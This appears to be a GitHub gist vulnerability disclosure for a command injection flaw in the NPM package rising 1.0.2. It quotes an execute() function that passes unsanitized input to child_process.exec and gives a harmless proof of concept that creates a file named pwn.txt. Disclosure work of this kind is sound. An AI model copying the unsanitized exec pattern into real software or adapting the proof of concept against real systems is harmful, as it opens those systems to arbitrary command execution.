Skip to content

Instantly share code, notes, and snippets.

@Splint3r7

Splint3r7/rising-1.0.2-command-injection.md

Last active November 11, 2023 14:16
Show Gist options
  • Save Splint3r7/63586940c4d313389c8f1ca1b00cd9bf to your computer and use it in GitHub Desktop.
Save Splint3r7/63586940c4d313389c8f1ca1b00cd9bf to your computer and use it in GitHub Desktop.
Download ZIP
Command Injection Vulnerability in Rising 1.0.2
Raw
rising-1.0.2-command-injection.md

Command Injection Vulnerability in Rising 1.0.2

Command injection vulnerability was identified in NPM package rising version 1.0.2

Resources:

Code Analysis Background

child_process has been utilized in the plugin to execute the command. A user input has been used which is not being sanitized, which allows an attacker to perform command injection through rising package.

below is the code snippet that executes command without sanitizing it.

const child_process = require('child_process')
// other code
/**
 * Execute a (shell) command.
 * 
 * @param String cmd Your command.
 */ 
function execute(cmd) {
    child_process.exec(cmd)
}

Exploitation:

POC:

const rising = require('./index.js'); 

rising.println('Hello, world!');
rising.execute('touch pwn.txt');

Observer a new file pwn.txt will be created in the same directory.

Author

Hassan Khan Yusufzai

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment